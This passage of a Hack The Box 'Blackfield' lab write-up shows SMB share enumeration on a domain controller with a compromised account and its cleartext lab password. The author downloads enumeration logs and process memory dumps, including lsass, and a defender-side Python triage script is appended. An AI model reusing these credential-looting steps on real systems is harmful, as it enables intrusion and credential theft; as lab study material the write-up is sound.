SMB
┌──(kali㉿kali)-[~/archive/htb/labs/blackfield]
└─$ smbclient -L //dc01.blackfield.local/
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
forensic Disk Forensic / Audit share.
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
profiles$ Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
Upon [[Blackfield_ForceChangePassword|compromising]] the audit2020 account via the [ForceChangePassword](https://bloodhound.readthedocs.io/en/latest/data-analysis/edges.html#forcechangepassword) edge, it was easily inferred that the account likely had a connection to the \\dc01.blackfield.local\forensic share, as indicated by the username.
┌──(kali㉿kali)-[~/archive/htb/labs/blackfield]
└─$ KRB5CCNAME=audit2020@dc01.blackfield.local.ccache crackmapexec smb dc01.blackfield.local --use-kcache -k --kdcHost dc01.blackfield.local --shares
SMB dc01.blackfield.local 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB dc01.blackfield.local 445 DC01 [+] BLACKFIELD.local\ from ccache
SMB dc01.blackfield.local 445 DC01 [+] Enumerated shares
SMB dc01.blackfield.local 445 DC01 Share Permissions Remark
SMB dc01.blackfield.local 445 DC01 ----- ----------- ------
SMB dc01.blackfield.local 445 DC01 ADMIN$ Remote Admin
SMB dc01.blackfield.local 445 DC01 C$ Default share
SMB dc01.blackfield.local 445 DC01 forensic READ Forensic / Audit share.
SMB dc01.blackfield.local 445 DC01 IPC$ READ Remote IPC
SMB dc01.blackfield.local 445 DC01 NETLOGON READ Logon server share
SMB dc01.blackfield.local 445 DC01 profiles$ READ
SMB dc01.blackfield.local 445 DC01 SYSVOL READ Logon server share
Checking the permissions with crackmapexec indeed reveals that the audit2020 account has read access to the \\dc01.blackfield.local\forensic share.
\\dc01.blackfield.local\forensic
┌──(kali㉿kali)-[~/archive/htb/labs/blackfield]
└─$ KRB5CCNAME=audit2020@dc01.blackfield.local.ccache impacket-smbclient BLACKFIELD.LOCAL/@dc01.blackfield.local -k -no-pass -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
Type help for list of commands
# use forensic
# ls
drw-rw-rw- 0 Sun Feb 23 16:10:16 2020 .
drw-rw-rw- 0 Sun Feb 23 16:10:16 2020 ..
drw-rw-rw- 0 Sun Feb 23 19:14:37 2020 commands_output
drw-rw-rw- 0 Thu May 28 22:29:24 2020 memory_analysis
drw-rw-rw- 0 Fri Feb 28 23:30:34 2020 tools
There are 3 sub-directories within the \\dc01.blackfield.local\forensic share.
\\dc01.blackfield.local\forensic\commands_output
# ls
drw-rw-rw- 0 Sun Feb 23 19:14:37 2020 .
drw-rw-rw- 0 Sun Feb 23 19:14:37 2020 ..
-rw-rw-rw- 528 Sun Feb 23 19:12:54 2020 domain_admins.txt
-rw-rw-rw- 962 Sun Feb 23 19:12:54 2020 domain_groups.txt
-rw-rw-rw- 16454 Fri Feb 28 23:32:17 2020 domain_users.txt
-rw-rw-rw- 518202 Sun Feb 23 19:12:54 2020 firewall_rules.txt
-rw-rw-rw- 1782 Sun Feb 23 19:12:54 2020 ipconfig.txt
-rw-rw-rw- 3842 Sun Feb 23 19:12:54 2020 netstat.txt
-rw-rw-rw- 3976 Sun Feb 23 19:12:54 2020 route.txt
-rw-rw-rw- 4550 Sun Feb 23 19:12:54 2020 systeminfo.txt
-rw-rw-rw- 9990 Sun Feb 23 19:12:54 2020 tasklist.txt
The commands_output directory contains text files whose names resemble the output of common enumeration commands.
┌──(kali㉿kali)-[~/…/blackfield/smb/forensic/commands_output]
└─$ smbget --recursive smb://dc01.blackfield.local/forensic/commands_output -U 'BLACKFIELD/audit2020%Qwer1234'
using domain: BLACKFIELD, user: audit2020
using domain: BLACKFIELD, user: audit2020
smb://dc01.blackfield.local/forensic/commands_output/domain_admins.txt
using domain: BLACKFIELD, user: audit2020
smb://dc01.blackfield.local/forensic/commands_output/domain_groups.txt
using domain: BLACKFIELD, user: audit2020
smb://dc01.blackfield.local/forensic/commands_output/domain_users.txt
using domain: BLACKFIELD, user: audit2020
smb://dc01.blackfield.local/forensic/commands_output/firewall_rules.txt
using domain: BLACKFIELD, user: audit2020
smb://dc01.blackfield.local/forensic/commands_output/ipconfig.txt
using domain: BLACKFIELD, user: audit2020
smb://dc01.blackfield.local/forensic/commands_output/netstat.txt
using domain: BLACKFIELD, user: audit2020
smb://dc01.blackfield.local/forensic/commands_output/route.txt
using domain: BLACKFIELD, user: audit2020
smb://dc01.blackfield.local/forensic/commands_output/systeminfo.txt
using domain: BLACKFIELD, user: audit2020
smb://dc01.blackfield.local/forensic/commands_output/tasklist.txt
Downloaded 547.15kB in 2 seconds
Downloading them to Kali
domain_admins.txt
# cat domain_admins.txt
Group name Domain Admins
Comment Designated administrators of the domain
Members
-------------------------------------------------------------------------------
Administrator Ipwn3dYourCompany
The command completed successfully.
This appears to be the output of NET GROUPS /DOMAIN "Domain Admins".
There is an unfamiliar user: Ipwn3dYourCompany.
domain_groups.txt
# cat domain_groups.txt
Group Accounts for \\DC01
-------------------------------------------------------------------------------
*Cloneable Domain Controllers
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Key Admins
*Enterprise Read-only Domain Controllers
*Group Policy Creator Owners
*Key Admins
*Protected Users
*Read-only Domain Controllers
*Schema Admins
The command completed successfully.
This appears to be the output of NET GROUPS /DOMAIN.
Interestingly, the hostname matches the target's hostname.
It is possible that all these files are the output logs of an active adversary on the target system.
domain_users.txt
# cat domain_users.txt
User accounts for \\DC01
-------------------------------------------------------------------------------
Administrator audit2020 BLACKFIELD103974
BLACKFIELD106360 BLACKFIELD107197 BLACKFIELD112766
BLACKFIELD114762 BLACKFIELD115148 BLACKFIELD118321
BLACKFIELD128775 BLACKFIELD129328 BLACKFIELD129387
BLACKFIELD131771 BLACKFIELD135403 BLACKFIELD135990
BLACKFIELD136203 BLACKFIELD136813 BLACKFIELD137694
BLACKFIELD146200 BLACKFIELD148067 BLACKFIELD150357
BLACKFIELD160610 BLACKFIELD160820 BLACKFIELD163183
BLACKFIELD169035 BLACKFIELD169876 BLACKFIELD171624
BLACKFIELD175204 BLACKFIELD184482 BLACKFIELD184493
BLACKFIELD186980 BLACKFIELD189208 BLACKFIELD191416
BLACKFIELD192642 BLACKFIELD194732 BLACKFIELD195757
BLACKFIELD195953 BLACKFIELD196444 BLACKFIELD198927
BLACKFIELD199889 BLACKFIELD201655 BLACKFIELD202900
BLACKFIELD204805 BLACKFIELD219324 BLACKFIELD219914
BLACKFIELD220786 BLACKFIELD224839 BLACKFIELD227380
BLACKFIELD228442 BLACKFIELD229506 BLACKFIELD230515
BLACKFIELD235930 BLACKFIELD236467 BLACKFIELD246388
BLACKFIELD247450 BLACKFIELD250576 BLACKFIELD251003
BLACKFIELD251977 BLACKFIELD252379 BLACKFIELD253047
BLACKFIELD253541 BLACKFIELD256791 BLACKFIELD266096
BLACKFIELD267457 BLACKFIELD268320 BLACKFIELD269538
BLACKFIELD274109 BLACKFIELD274367 BLACKFIELD274577
BLACKFIELD286615 BLACKFIELD289513 BLACKFIELD290325
BLACKFIELD290582 BLACKFIELD291678 BLACKFIELD307633
BLACKFIELD314351 BLACKFIELD315276 BLACKFIELD316850
BLACKFIELD318077 BLACKFIELD318250 BLACKFIELD319016
BLACKFIELD321206 BLACKFIELD327610 BLACKFIELD328983
BLACKFIELD329802 BLACKFIELD334058 BLACKFIELD336573
BLACKFIELD339143 BLACKFIELD348433 BLACKFIELD348835
BLACKFIELD350809 BLACKFIELD356727 BLACKFIELD357023
BLACKFIELD358090 BLACKFIELD359278 BLACKFIELD362337
BLACKFIELD371669 BLACKFIELD375924 BLACKFIELD382769
BLACKFIELD383108 BLACKFIELD385719 BLACKFIELD385928
BLACKFIELD390179 BLACKFIELD390192 BLACKFIELD395725
BLACKFIELD397679 BLACKFIELD402639 BLACKFIELD404213
BLACKFIELD404458 BLACKFIELD405242 BLACKFIELD410243
BLACKFIELD411132 BLACKFIELD411740 BLACKFIELD412798
BLACKFIELD413242 BLACKFIELD415829 BLACKFIELD416532
BLACKFIELD419600 BLACKFIELD428532 BLACKFIELD429587
BLACKFIELD430864 BLACKFIELD433476 BLACKFIELD434395
BLACKFIELD438814 BLACKFIELD438923 BLACKFIELD441593
BLACKFIELD441759 BLACKFIELD446463 BLACKFIELD448641
BLACKFIELD454313 BLACKFIELD460131 BLACKFIELD464763
BLACKFIELD465267 BLACKFIELD468839 BLACKFIELD478410
BLACKFIELD478828 BLACKFIELD484290 BLACKFIELD488531
BLACKFIELD496547 BLACKFIELD497216 BLACKFIELD500073
BLACKFIELD512331 BLACKFIELD518316 BLACKFIELD520852
BLACKFIELD522135 BLACKFIELD532412 BLACKFIELD533060
BLACKFIELD533551 BLACKFIELD533886 BLACKFIELD534196
BLACKFIELD534956 BLACKFIELD538365 BLACKFIELD541148
BLACKFIELD544934 BLACKFIELD546640 BLACKFIELD548394
BLACKFIELD548464 BLACKFIELD549571 BLACKFIELD553715
BLACKFIELD558867 BLACKFIELD561870 BLACKFIELD566117
BLACKFIELD569313 BLACKFIELD569653 BLACKFIELD573498
BLACKFIELD576233 BLACKFIELD579344 BLACKFIELD579980
BLACKFIELD584113 BLACKFIELD586592 BLACKFIELD586934
BLACKFIELD591846 BLACKFIELD592556 BLACKFIELD594619
BLACKFIELD600999 BLACKFIELD601590 BLACKFIELD602567
BLACKFIELD606328 BLACKFIELD606964 BLACKFIELD607290
BLACKFIELD608914 BLACKFIELD609423 BLACKFIELD611993
BLACKFIELD613771 BLACKFIELD616527 BLACKFIELD617630
BLACKFIELD618519 BLACKFIELD622501 BLACKFIELD623122
BLACKFIELD624385 BLACKFIELD631162 BLACKFIELD631599
BLACKFIELD632329 BLACKFIELD634593 BLACKFIELD635996
BLACKFIELD639103 BLACKFIELD644281 BLACKFIELD651599
BLACKFIELD652779 BLACKFIELD653097 BLACKFIELD657263
BLACKFIELD665997 BLACKFIELD673073 BLACKFIELD676303
BLACKFIELD680939 BLACKFIELD682842 BLACKFIELD682949
BLACKFIELD683323 BLACKFIELD684814 BLACKFIELD686428
BLACKFIELD690642 BLACKFIELD691480 BLACKFIELD694429
BLACKFIELD695166 BLACKFIELD697473 BLACKFIELD701303
BLACKFIELD704154 BLACKFIELD706381 BLACKFIELD710285
BLACKFIELD713470 BLACKFIELD717683 BLACKFIELD724669
BLACKFIELD727512 BLACKFIELD732035 BLACKFIELD739227
BLACKFIELD739659 BLACKFIELD739765 BLACKFIELD744790
BLACKFIELD753480 BLACKFIELD753537 BLACKFIELD758945
BLACKFIELD759042 BLACKFIELD759079 BLACKFIELD763893
BLACKFIELD764430 BLACKFIELD765350 BLACKFIELD765982
BLACKFIELD767498 BLACKFIELD767820 BLACKFIELD768095
BLACKFIELD773118 BLACKFIELD773423 BLACKFIELD774376
BLACKFIELD775126 BLACKFIELD775986 BLACKFIELD781404
BLACKFIELD787464 BLACKFIELD787995 BLACKFIELD788523
BLACKFIELD789969 BLACKFIELD792484 BLACKFIELD793029
BLACKFIELD796301 BLACKFIELD802251 BLACKFIELD802875
BLACKFIELD813266 BLACKFIELD818863 BLACKFIELD819822
BLACKFIELD820995 BLACKFIELD826622 BLACKFIELD827906
BLACKFIELD828826 BLACKFIELD835725 BLACKFIELD837541
BLACKFIELD838710 BLACKFIELD839613 BLACKFIELD840481
BLACKFIELD842438 BLACKFIELD842593 BLACKFIELD843883
BLACKFIELD848660 BLACKFIELD859776 BLACKFIELD868068
BLACKFIELD869335 BLACKFIELD871753 BLACKFIELD875008
BLACKFIELD876916 BLACKFIELD877328 BLACKFIELD883784
BLACKFIELD884808 BLACKFIELD894905 BLACKFIELD895235
BLACKFIELD896715 BLACKFIELD898237 BLACKFIELD899238
BLACKFIELD899433 BLACKFIELD907614 BLACKFIELD908329
BLACKFIELD909590 BLACKFIELD911926 BLACKFIELD926559
BLACKFIELD932709 BLACKFIELD933887 BLACKFIELD937395
BLACKFIELD939200 BLACKFIELD939243 BLACKFIELD946435
BLACKFIELD946509 BLACKFIELD962495 BLACKFIELD962999
BLACKFIELD969352 BLACKFIELD971417 BLACKFIELD978938
BLACKFIELD990638 BLACKFIELD991588 BLACKFIELD994577
BLACKFIELD995218 BLACKFIELD996878 BLACKFIELD997545
BLACKFIELD998321 Guest Ipwn3dYouCompany
krbtgt lydericlefebvre support
The command completed successfully.
While this appears to be the output of NET USERS /DOMAIN, it also confirms my earlier hypothesis: this was run on the target system, dc01.blackfield.local.
firewall_rules.txt
# cat firewall_rules.txt
[...REDACTED...]
It's redacted here due to the enormous amount of data; there is nothing special in it.
ipconfig.txt
# cat ipconfig.txt
Windows IP Configuration
Host Name . . . . . . . . . . . . : DC01
Primary Dns Suffix . . . . . . . : BLACKFIELD.local
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : BLACKFIELD.local
Ethernet adapter Ethernet:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Desktop Adapter
Physical Address. . . . . . . . . : 08-00-27-F3-DC-8D
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
IPv4 Address. . . . . . . . . . . : 192.168.86.156(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.86.1
DNS Servers . . . . . . . . . . . : 127.0.0.1
NetBIOS over Tcpip. . . . . . . . : Disabled
The output is from the ipconfig command, and it shows an unfamiliar IPv4 address: 192.168.86.156.
The DC host might have gone through some changes since.
netstat.txt
# cat netstat.txt
Active Connections
Proto Local Address Foreign Address State
TCP 127.0.0.1:389 DC01:49679 ESTABLISHED
TCP 127.0.0.1:389 DC01:49681 ESTABLISHED
TCP 127.0.0.1:389 DC01:49698 ESTABLISHED
TCP 127.0.0.1:389 DC01:51060 ESTABLISHED
TCP 127.0.0.1:389 DC01:51125 ESTABLISHED
TCP 127.0.0.1:49679 DC01:ldap ESTABLISHED
TCP 127.0.0.1:49681 DC01:ldap ESTABLISHED
TCP 127.0.0.1:49698 DC01:ldap ESTABLISHED
TCP 127.0.0.1:51060 DC01:ldap ESTABLISHED
TCP 127.0.0.1:51125 DC01:ldap ESTABLISHED
TCP 192.168.86.156:389 DC01:51016 ESTABLISHED
TCP 192.168.86.156:389 DC01:60961 ESTABLISHED
TCP 192.168.86.156:389 DC01:60987 ESTABLISHED
TCP 192.168.86.156:389 DC01:60993 ESTABLISHED
TCP 192.168.86.156:51016 DC01:ldap ESTABLISHED
TCP 192.168.86.156:60961 DC01:ldap ESTABLISHED
TCP 192.168.86.156:60987 DC01:ldap ESTABLISHED
TCP 192.168.86.156:60993 DC01:ldap ESTABLISHED
TCP 192.168.86.156:63810 40.67.251.132:https ESTABLISHED
TCP 192.168.86.156:63830 40.67.251.132:https ESTABLISHED
TCP [::1]:49667 DC01:60989 ESTABLISHED
TCP [::1]:49667 DC01:63777 ESTABLISHED
TCP [::1]:49667 DC01:63836 ESTABLISHED
TCP [::1]:51178 DC01:epmap TIME_WAIT
TCP [::1]:60989 DC01:49667 ESTABLISHED
TCP [::1]:63777 DC01:49667 ESTABLISHED
TCP [::1]:63836 DC01:49667 ESTABLISHED
Nothing special here.
route.txt
# cat route.txt
===========================================================================
Interface List
3...08 00 27 f3 dc 8d ......Intel(R) PRO/1000 MT Desktop Adapter
1...........................Software Loopback Interface 1
===========================================================================
IPv4 Route Table
===========================================================================
Active Routes:
Network Destination Netmask Gateway Interface Metric
0.0.0.0 0.0.0.0 192.168.86.1 192.168.86.156 281
127.0.0.0 255.0.0.0 On-link 127.0.0.1 331
127.0.0.1 255.255.255.255 On-link 127.0.0.1 331
127.255.255.255 255.255.255.255 On-link 127.0.0.1 331
192.168.86.0 255.255.255.0 On-link 192.168.86.156 281
192.168.86.156 255.255.255.255 On-link 192.168.86.156 281
192.168.86.255 255.255.255.255 On-link 192.168.86.156 281
224.0.0.0 240.0.0.0 On-link 127.0.0.1 331
224.0.0.0 240.0.0.0 On-link 192.168.86.156 281
255.255.255.255 255.255.255.255 On-link 127.0.0.1 331
255.255.255.255 255.255.255.255 On-link 192.168.86.156 281
===========================================================================
Persistent Routes:
Network Address Netmask Gateway Address Metric
0.0.0.0 0.0.0.0 192.168.86.1 Default
===========================================================================
IPv6 Route Table
===========================================================================
Active Routes:
If Metric Network Destination Gateway
1 331 ::1/128 On-link
1 331 ff00::/8 On-link
===========================================================================
Persistent Routes:
None
While this is the output of the route print command, there's nothing special here.
systeminfo.txt
# cat systeminfo.txt
Host Name: DC01
OS Name: Microsoft Windows Server 2019 Standard Evaluation
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Primary Domain Controller
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00431-10000-00000-AA435
Original Install Date: 2/1/2020, 11:04:40 AM
System Boot Time: 2/23/2020, 3:13:56 AM
System Manufacturer: innotek GmbH
System Model: VirtualBox
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: Intel64 Family 6 Model 142 Stepping 10 GenuineIntel ~1801 Mhz
BIOS Version: innotek GmbH VirtualBox, 12/1/2006
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: fr;French (France)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 2,048 MB
Available Physical Memory: 901 MB
Virtual Memory: Max Size: 5,283 MB
Virtual Memory: Available: 2,891 MB
Virtual Memory: In Use: 2,392 MB
Page File Location(s): C:\pagefile.sys
Domain: BLACKFIELD.local
Logon Server: \\DC01
Hotfix(s): 3 Hotfix(s) Installed.
[01]: KB4514366
[02]: KB4512577
[03]: KB4512578
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Desktop Adapter
Connection Name: Ethernet
DHCP Enabled: No
IP address(es)
[01]: 192.168.86.156
Hyper-V Requirements: VM Monitor Mode Extensions: No
Virtualization Enabled In Firmware: No
Second Level Address Translation: No
Data Execution Prevention Available: Yes
Now this is rather interesting, as more sensitive information is exposed. While the DC host might have gone through some changes, as suspected earlier, it's nice to have the system information available:
Microsoft Windows Server 2019 Standard Evaluation
10.0.17763 N/A Build 17763
x64-based
1 Processor(s)
3 Hotfix(s)
[01]: KB4514366
[02]: KB4512577
[03]: KB4512578
fr;French (France)
tasklist.txt
# cat tasklist.txt
Image Name PID Session Name Session# Mem Usage
========================= ======== ================ =========== ============
System Idle Process 0 Services 0 8 K
System 4 Services 0 144 K
Registry 68 Services 0 60,316 K
smss.exe 244 Services 0 8 K
csrss.exe 340 Services 0 456 K
csrss.exe 412 Console 1 1,420 K
wininit.exe 420 Services 0 12 K
winlogon.exe 468 Console 1 1,160 K
services.exe 532 Services 0 4,348 K
lsass.exe 540 Services 0 39,144 K
svchost.exe 724 Services 0 7,772 K
svchost.exe 756 Services 0 6,688 K
dwm.exe 848 Console 1 41,360 K
svchost.exe 920 Services 0 3,248 K
svchost.exe 928 Services 0 27,548 K
svchost.exe 948 Services 0 5,392 K
svchost.exe 968 Services 0 432 K
svchost.exe 996 Services 0 4,704 K
svchost.exe 1012 Services 0 12,196 K
svchost.exe 332 Services 0 8,136 K
svchost.exe 1036 Services 0 4,632 K
svchost.exe 1220 Services 0 156 K
svchost.exe 1272 Services 0 1,300 K
svchost.exe 1800 Services 0 1,084 K
svchost.exe 1952 Services 0 3,108 K
fontdrvhost.exe 2036 Console 1 1,528 K
fontdrvhost.exe 2044 Services 0 16 K
spoolsv.exe 876 Services 0 16 K
svchost.exe 836 Services 0 2,860 K
Microsoft.ActiveDirectory 1412 Services 0 30,740 K
svchost.exe 1600 Services 0 12,300 K
dfsrs.exe 1708 Services 0 9,652 K
dns.exe 1796 Services 0 4,576 K
ismserv.exe 1496 Services 0 1,576 K
dfssvc.exe 568 Services 0 2,008 K
MsMpEng.exe 2076 Services 0 55,692 K
wlms.exe 2088 Services 0 1,532 K
msdtc.exe 1676 Services 0 16 K
svchost.exe 1868 Services 0 3,428 K
svchost.exe 2480 Services 0 6,136 K
sihost.exe 3464 Console 1 3,592 K
svchost.exe 3472 Console 1 2,328 K
taskhostw.exe 3548 Console 1 3,916 K
ctfmon.exe 3756 Console 1 4,540 K
explorer.exe 3936 Console 1 33,528 K
ShellExperienceHost.exe 3688 Console 1 16 K
SearchUI.exe 3156 Console 1 16 K
RuntimeBroker.exe 4184 Console 1 264 K
RuntimeBroker.exe 4256 Console 1 4,856 K
ServerManager.exe 4332 Console 1 63,888 K
RuntimeBroker.exe 4616 Console 1 556 K
smartscreen.exe 4780 Console 1 1,888 K
dllhost.exe 892 Console 1 1,560 K
NisSrv.exe 2692 Services 0 1,240 K
powershell.exe 1988 Console 1 2,092 K
conhost.exe 4284 Console 1 2,104 K
taskhostw.exe 5064 Console 1 2,872 K
mmc.exe 2456 Console 1 23,536 K
powershell.exe 1732 Console 1 115,336 K
conhost.exe 4432 Console 1 8,072 K
WmiPrvSE.exe 3404 Services 0 15,288 K
tasklist.exe 3092 Console 1 7,464 K
AV is up and running (NisSrv.exe, smartscreen.exe), and the spooler is also running (spoolsv.exe).
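As an added, defender-side example that is not part of the original writeup: a small Python triage script for the two listings above, the NET USERS /DOMAIN output in domain_users.txt and the tasklist output. It flags the accounts that fall outside the BLACKFIELD###### naming convention (the same ones that stand out by eye) and confirms which security-relevant processes are present. The abbreviated sample inputs and the process watch list are constructed here, not taken from the share.

```python
import re

# Constructed sample inputs: abbreviated copies of domain_users.txt and tasklist.txt
# from the forensic share (most BLACKFIELD###### rows dropped, column whitespace collapsed).
NET_USER_OUTPUT = """\
User accounts for \\\\DC01
-------------------------------------------------------------------------------
Administrator audit2020 BLACKFIELD103974
BLACKFIELD106360 BLACKFIELD107197 BLACKFIELD112766
BLACKFIELD998321 Guest Ipwn3dYouCompany
krbtgt lydericlefebvre support
The command completed successfully.
"""
TASKLIST_OUTPUT = """\
Image Name PID Session Name Session# Mem Usage
========================= ======== ================ =========== ============
System Idle Process 0 Services 0 8 K
lsass.exe 540 Services 0 39,144 K
spoolsv.exe 876 Services 0 16 K
MsMpEng.exe 2076 Services 0 55,692 K
NisSrv.exe 2692 Services 0 1,240 K
smartscreen.exe 4780 Console 1 1,888 K
powershell.exe 1732 Console 1 115,336 K
"""

BULK_NAMING = re.compile(r"^BLACKFIELD\d{6}$")           # convention seen in the listing
BUILTIN_ACCOUNTS = {"Administrator", "Guest", "krbtgt"}  # present on any domain controller
# Assumed triage watch list (ours, not the page's): security and spooler services to confirm.
WATCH_LIST = {
    "MsMpEng.exe": "Microsoft Defender antimalware engine",
    "NisSrv.exe": "Microsoft Defender network inspection service",
    "smartscreen.exe": "Windows SmartScreen",
    "spoolsv.exe": "Print Spooler service",
}
TASK_ROW = re.compile(r"^(?P<image>.+?)\s+(?P<pid>\d+)\s+(?P<session>\S+)\s+"
                      r"(?P<session_no>\d+)\s+(?P<mem>[\d,]+ K)\s*$")

def parse_net_user(text: str) -> list[str]:
    """Names listed by `net user /domain`: every token between the dashed separator
    and the closing status line (account names never contain spaces)."""
    users, in_table = [], False
    for line in text.splitlines():
        if line.startswith("----"):
            in_table = True
        elif line.startswith("The command completed"):
            break
        elif in_table:
            users.extend(line.split())
    return users

def flag_unexpected_accounts(users: list[str]) -> list[str]:
    """Accounts matching neither the bulk naming convention nor a known built-in."""
    return [u for u in users if u not in BUILTIN_ACCOUNTS and not BULK_NAMING.match(u)]

def parse_tasklist(text: str) -> list[dict]:
    """Rows of `tasklist` output. The image name is matched lazily so names containing
    spaces ('System Idle Process') survive; header and separator rows never match."""
    procs = []
    for line in text.splitlines():
        m = TASK_ROW.match(line)
        if m:
            rec = m.groupdict()
            rec["pid"] = int(rec["pid"])
            procs.append(rec)
    return procs

def flag_watched_processes(procs: list[dict]) -> dict[str, int]:
    """Image name -> PID for every watch-list process present in the listing."""
    return {p["image"]: p["pid"] for p in procs if p["image"] in WATCH_LIST}

if __name__ == "__main__":
    print("non-standard accounts:", flag_unexpected_accounts(parse_net_user(NET_USER_OUTPUT)))
    print("watched processes:", flag_watched_processes(parse_tasklist(TASKLIST_OUTPUT)))
```

Run against the full domain_users.txt and tasklist.txt pulled from the share, the same two functions produce the list of non-pattern accounts and the PIDs of the AV and spooler processes noted above.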
\\dc01.blackfield.local\forensic\memory_analysis
# cd memory_analysis
# ls
drw-rw-rw- 0 Thu May 28 22:29:24 2020 .
drw-rw-rw- 0 Thu May 28 22:29:24 2020 ..
-rw-rw-rw- 37876530 Thu May 28 22:29:24 2020 conhost.zip
-rw-rw-rw- 24962333 Thu May 28 22:29:24 2020 ctfmon.zip
-rw-rw-rw- 23993305 Thu May 28 22:29:24 2020 dfsrs.zip
-rw-rw-rw- 18366396 Thu May 28 22:29:24 2020 dllhost.zip
-rw-rw-rw- 8810157 Thu May 28 22:29:24 2020 ismserv.zip
-rw-rw-rw- 41936098 Thu May 28 22:29:24 2020 lsass.zip
-rw-rw-rw- 64288607 Thu May 28 22:29:24 2020 mmc.zip
-rw-rw-rw- 13332174 Thu May 28 22:29:24 2020 RuntimeBroker.zip
-rw-rw-rw- 131983313 Thu May 28 22:29:24 2020 ServerManager.zip
-rw-rw-rw- 33141744 Thu May 28 22:29:24 2020 sihost.zip
-rw-rw-rw- 33756344 Thu May 28 22:29:24 2020 smartscreen.zip
-rw-rw-rw- 14408833 Thu May 28 22:29:24 2020 svchost.zip
-rw-rw-rw- 34631412 Thu May 28 22:29:24 2020 taskhostw.zip
-rw-rw-rw- 14255089 Thu May 28 22:29:24 2020 winlogon.zip
-rw-rw-rw- 4067425 Thu May 28 22:29:24 2020 wlms.zip
-rw-rw-rw- 18303252 Thu May 28 22:29:24 2020 WmiPrvSE.zip
The memory_analysis directory contains 16 archive files.
Judging by the name of the parent directory and the share, these archives likely contain memory dumps.
┌──(kali㉿kali)-[~/…/blackfield/smb/forensic/memory_analysis]
└─$ smbget --recursive smb://dc01.blackfield.local/forensic/memory_analysis -U 'BLACKFIELD/audit2020%Qwer1234'
using domain: BLACKFIELD, user: audit2020
using domain: BLACKFIELD, user: audit2020
smb://dc01.blackfield.local/forensic/memory_analysis/conhost.zip
using domain: BLACKFIELD, user: audit2020
smb://dc01.blackfield.local/forensic/memory_analysis/ctfmon.zip
using domain: BLACKFIELD, user: audit2020
smb://dc01.blackfield.local/forensic/memory_analysis/dfsrs.zip
using domain: BLACKFIELD, user: audit2020
smb://dc01.blackfield.local/forensic/memory_analysis/dllhost.zip
using domain: BLACKFIELD, user: audit2020
smb://dc01.blackfield.local/forensic/memory_analysis/ismserv.zip
using domain: BLACKFIELD, user: audit2020
smb://dc01.blackfield.local/forensic/memory_analysis/lsass.zip
using domain: BLACKFIELD, user: audit2020
smb://dc01.blackfield.local/forensic/memory_analysis/mmc.zip
using domain: BLACKFIELD, user: audit2020
smb://dc01.blackfield.local/forensic/memory_analysis/RuntimeBroker.zip
using domain: BLACKFIELD, user: audit2020
smb://dc01.blackfield.local/forensic/memory_analysis/ServerManager.zip
using domain: BLACKFIELD, user: audit2020
smb://dc01.blackfield.local/forensic/memory_analysis/sihost.zip
using domain: BLACKFIELD, user: audit2020
smb://dc01.blackfield.local/forensic/memory_analysis/smartscreen.zip
using domain: BLACKFIELD, user: audit2020
smb://dc01.blackfield.local/forensic/memory_analysis/svchost.zip
using domain: BLACKFIELD, user: audit2020
smb://dc01.blackfield.local/forensic/memory_analysis/taskhostw.zip
using domain: BLACKFIELD, user: audit2020
smb://dc01.blackfield.local/forensic/memory_analysis/winlogon.zip
using domain: BLACKFIELD, user: audit2020
smb://dc01.blackfield.local/forensic/memory_analysis/wlms.zip
using domain: BLACKFIELD, user: audit2020
smb://dc01.blackfield.local/forensic/memory_analysis/WmiPrvSE.zip
Downloaded 494.11MB in 259 seconds
Downloading them to Kali
┌──(kali㉿kali)-[~/…/blackfield/smb/forensic/memory_analysis]
└─$ unzip \*.zip
Archive: taskhostw.zip
inflating: taskhostw.DMP
Archive: dllhost.zip
inflating: dllhost.DMP
Archive: lsass.zip
inflating: lsass.DMP
Archive: conhost.zip
inflating: conhost.DMP
Archive: RuntimeBroker.zip
inflating: RuntimeBroker.DMP
Archive: ismserv.zip
inflating: ismserv.DMP
Archive: WmiPrvSE.zip
inflating: WmiPrvSE.DMP
Archive: smartscreen.zip
inflating: smartscreen.DMP
Archive: ServerManager.zip
inflating: ServerManager.DMP
Archive: winlogon.zip
inflating: winlogon.DMP
Archive: mmc.zip
inflating: mmc.DMP
Archive: svchost.zip
inflating: svchost.DMP
Archive: sihost.zip
inflating: sihost.DMP
Archive: wlms.zip
inflating: wlms.DMP
Archive: dfsrs.zip
inflating: dfsrs.DMP
Archive: ctfmon.zip
inflating: ctfmon.DMP
16 archives were successfully processed.
Extracting the archives. As expected, those 16 archives contain memory dumps. Static analysis will take place in a dedicated page.
\\dc01.blackfield.local\forensic\tools
# cd tools
# ls
drw-rw-rw- 0 Fri Feb 28 23:30:34 2020 .
drw-rw-rw- 0 Fri Feb 28 23:30:34 2020 ..
drw-rw-rw- 0 Fri Feb 28 23:30:34 2020 sleuthkit-4.8.0-win32
drw-rw-rw- 0 Fri Feb 28 23:30:35 2020 sysinternals
drw-rw-rw- 0 Fri Feb 28 23:30:35 2020 volatility
The tools directory contains 3 tools that are commonly used for forensics.
While there is nothing special about them, as those directories just contain the tools themselves, their presence may imply that forensic work was needed on this host.